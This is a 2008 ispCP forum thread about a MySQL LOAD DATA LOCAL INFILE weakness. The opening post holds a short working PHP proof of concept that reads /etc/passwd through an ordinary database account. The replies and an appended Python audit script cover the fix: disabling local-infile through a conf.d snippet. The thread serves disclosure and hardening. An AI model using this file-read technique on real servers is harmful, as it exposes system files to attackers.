ispCP - Board - Support
exploit

+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega Development Area (/forum-1.html)
+--- Forum: General discussion (/forum-11.html)
+--- Thread: exploit (/thread-3772.html)



exploit - sci2tech - 07-16-2008 09:06 PM

Well known, old, not generated by ispcp, but it affects it.
Code:
<?php
// Connect with an ordinary, low-privileged MySQL account.
$link = mysql_connect('localhost', 'sqluser1', 'sqluser1');
mysql_select_db('bla');
// Create a scratch table in the account's own database ...
mysql_query("CREATE TABLE a (a varchar(1024))");
// ... then let the MySQL client library read a file and send its
// contents into that table. The server only accepts this while
// local-infile is enabled.
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a");
// Read the file contents back out of the table, line by line.
$result = mysql_query("SELECT a FROM a");
while (list($row) = mysql_fetch_row($result))
    print "$row\n";
// Remove the scratch table again.
mysql_query("DROP TABLE `a`");
?>
To get rid of this, you need to add the following to my.cnf in the [mysqld] section:
Quote:
set-variable=local-infile=0
Maybe this should be implemented as a security feature in ispcp.


RE: exploit - aseques - 07-22-2008 12:19 AM

The issue is quite grave: even though you cannot get /etc/shadow, you can get lots of sensitive information if mysql is not chrooted (in ispcp it isn't).
In the case of Plesk, they set the value to 0 too.


RE: exploit - ephigenie - 07-22-2008 12:23 AM

mh.

Yeah, we'll see that we test if the value is present and, if not, append it in the [mysqld] section. Let's see how we can do that.

But after all it should be clear that this kind of information gathering is only possible if the attacker has a valid mysql account, or has found a method to inject malicious code into installed php applications (i.e. phpbb 2.x and so on are good candidates for such things).


RE: exploit - aseques - 07-22-2008 12:29 AM

In /etc/mysql/my.cnf, you can read
Code:
....................
#
# * IMPORTANT: Additional settings that can override those from this file!
#
!includedir /etc/mysql/conf.d/

So, you could probably create an /etc/mysql/conf.d/ispcp with the customized settings...


RE: exploit - ephigenie - 07-22-2008 12:31 AM

Yeah, this is a good point ... (let's see how this works out)


RE: exploit - FeG - 07-24-2008 07:08 AM

Hi,

I'd propose to create a file in /etc/mysql/conf.d named i.e. exploit-fix.cnf with the following content:
Code:
# Fixing http://www.isp-control.net/forum/exploit-t-3772.html
[mysqld]
set-variable=local-infile=0

until this is fixed officially by an ispCP config file.
You'll have to restart mysql thereafter:
Code:
/etc/init.d/mysql restart

Greetings
FeG
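The check ephigenie wants ("test if the value is present and if not append it") together with the conf.d approach from aseques and FeG, written out as an added example in Python. This is not code from the thread or from ispCP. It follows my.cnf's `!include` / `!includedir` directives in the order the server reads them, reports the effective local-infile value for the [mysqld] group (later files override earlier ones, which is why a conf.d snippet works), recognises both the legacy `set-variable=local-infile=0` form used above and the plain `local-infile=0` form, and writes a conf.d snippet only when the setting is missing or enabled. The config trees it inspects are constructed in temporary directories; the file layout, the snippet name and all function names are assumptions. After changing a real config the server still has to be restarted, and `SHOW VARIABLES LIKE 'local_infile'` on the running server remains the authoritative check.

```python
"""Audit a MySQL option-file tree for local-infile under [mysqld].

Added example, not code from the thread or from ispCP. Assumes a Debian-style
layout (my.cnf plus !includedir conf.d/) and the 2008-era behaviour in which
an unset local-infile means "enabled". All paths and names are constructed.
"""
import os
import re
import tempfile

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
# Matches "local-infile", "local_infile=0", "local-infile = OFF" and the legacy
# "set-variable=local-infile=0" form quoted in the thread.
OPTION_RE = re.compile(
    r"^\s*(?:set-variable\s*=\s*)?local[-_]infile\s*(?:=\s*(.*?))?\s*$", re.IGNORECASE
)
DISABLED_VALUES = {"0", "OFF", "FALSE", "NO"}


def iter_option_files(path):
    """Yield option files in read order, following !include and !includedir."""
    yield path
    try:
        with open(path) as fh:
            lines = fh.read().splitlines()
    except OSError:
        return
    for line in lines:
        parts = line.strip().split(None, 1)
        if len(parts) != 2:
            continue
        if parts[0] == "!includedir" and os.path.isdir(parts[1]):
            # On Unix the server reads only files ending in .cnf from the directory.
            for name in sorted(os.listdir(parts[1])):
                if name.endswith(".cnf"):
                    yield from iter_option_files(os.path.join(parts[1], name))
        elif parts[0] == "!include":
            yield from iter_option_files(parts[1])


def local_infile_setting(main_cnf):
    """Return the last local-infile value seen in a [mysqld] group, or None if unset."""
    value = None
    for path in iter_option_files(main_cnf):
        section = None
        try:
            with open(path) as fh:
                lines = fh.read().splitlines()
        except OSError:
            continue
        for line in lines:
            line = line.split("#", 1)[0]  # drop comments
            m = SECTION_RE.match(line)
            if m:
                section = m.group(1).strip().lower()
                continue
            if section != "mysqld":
                continue
            m = OPTION_RE.match(line)
            if m:
                raw = m.group(1)
                value = "1" if not raw else raw.strip("\"'")  # bare option means enabled
    return value


def local_infile_disabled(main_cnf):
    """True only when the effective setting explicitly disables LOAD DATA LOCAL."""
    value = local_infile_setting(main_cnf)
    return value is not None and value.upper() in DISABLED_VALUES


def ensure_disabled(main_cnf, conf_dir, snippet="zz-local-infile.cnf"):
    """Write a conf.d snippet if needed; returns its path, or None when already disabled."""
    if local_infile_disabled(main_cnf):
        return None
    path = os.path.join(conf_dir, snippet)
    with open(path, "w") as fh:
        fh.write("# Disable LOAD DATA LOCAL INFILE (written by local-infile audit)\n")
        fh.write("[mysqld]\nlocal-infile=0\n")
    return path  # the server must still be restarted to pick this up


def build_sample_tree(root, mysqld_extra=""):
    """Construct a sample my.cnf tree under root; test data, not a live config."""
    conf_dir = os.path.join(root, "conf.d")
    os.makedirs(conf_dir, exist_ok=True)
    main_cnf = os.path.join(root, "my.cnf")
    with open(main_cnf, "w") as fh:
        fh.write("[client]\nport = 3306\n\n[mysqld]\nuser = mysql\n%s\n" % mysqld_extra)
        fh.write("# * IMPORTANT: Additional settings that can override those from this file!\n")
        fh.write("!includedir %s/\n" % conf_dir)
    return main_cnf, conf_dir


def demo():
    """Run the audit against three constructed trees and return the findings."""
    findings = {}
    stock, conf_dir = build_sample_tree(tempfile.mkdtemp())  # nothing set: enabled by default
    findings["stock_value"] = local_infile_setting(stock)
    findings["stock_disabled"] = local_infile_disabled(stock)
    findings["snippet_written"] = ensure_disabled(stock, conf_dir) is not None
    findings["fixed_disabled"] = local_infile_disabled(stock)
    findings["second_run_noop"] = ensure_disabled(stock, conf_dir) is None
    legacy, _ = build_sample_tree(tempfile.mkdtemp(), "set-variable=local-infile=0")
    findings["legacy_syntax_disabled"] = local_infile_disabled(legacy)
    enabled, conf_dir = build_sample_tree(tempfile.mkdtemp(), "local-infile=1")
    ensure_disabled(enabled, conf_dir)  # conf.d is read after my.cnf, so the snippet wins
    findings["conf_d_overrides_main"] = local_infile_disabled(enabled)
    return findings


if __name__ == "__main__":
    for key, val in demo().items():
        print("%-24s %r" % (key, val))
```

The snippet name starts with `zz-` so that it sorts after any other file in conf.d and is the last word on the setting; on a real host, point `ensure_disabled` at `/etc/mysql/my.cnf` and `/etc/mysql/conf.d` and follow it with the `/etc/init.d/mysql restart` from FeG's post.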